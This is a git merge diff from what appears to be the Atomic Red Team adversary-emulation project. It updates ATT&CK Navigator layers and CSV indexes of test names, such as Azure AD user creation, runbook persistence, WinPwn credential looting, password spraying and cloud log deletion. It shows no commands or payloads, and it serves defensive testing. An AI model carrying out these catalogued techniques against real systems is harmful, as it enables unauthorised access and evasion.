Merge branch 'master' into T1110.001_II

2023-03-17 15:43:41 -04:00
parent 11ff8b9cb0 27770715fb
commit 278a7d5a6d
70 changed files with 3117 additions and 234 deletions
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -7,6 +7,8 @@ defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1136.003,Create Account: Cloud Account,2,Azure AD - Create a new user,e62d23ef-3153-4837-8625-fa4a3829134d,powershell
+persistence,T1136.003,Create Account: Cloud Account,3,Azure AD - Create a new user via Azure CLI,228c7498-be31-48e9-83b7-9cb906504ec8,powershell
 persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
 persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
@@ -4,6 +4,7 @@ defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
 defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
 discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
@@ -15,8 +16,11 @@ persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
 collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
 collection,T1530,Data from Cloud Storage Object,3,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
@@ -121,6 +121,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
+defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
 defense-evasion,T1562,Impair Defenses,1,Windows Disable LSA Protection,40075d5f-3a70-4c66-9125-f72bee87247d,command_prompt
 defense-evasion,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,powershell
@@ -441,6 +442,7 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,6,Hide a
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh
 defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,1,Alternate Data Streams (ADS),8822c3b0-d9f9-4daf-a043-49f4602364f4,command_prompt
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,2,Store file in Alternate Data Stream (ADS),2ab75061-f5d5-4c1a-b666-ba2a50df5b02,powershell
 defense-evasion,T1564.004,Hide Artifacts: NTFS File Attributes,3,Create ADS command prompt,17e7637a-ddaf-4a82-8622-377e20de8fdb,command_prompt
@@ -451,8 +453,11 @@ defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer S
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+defense-evasion,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,1,Lolbin Jsc.exe compile javascript to exe,1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8,command_prompt
 defense-evasion,T1127,Trusted Developer Utilities Proxy Execution,2,Lolbin Jsc.exe compile javascript to dll,3fc9fea2-871d-414d-8ef6-02e85e322b80,command_prompt
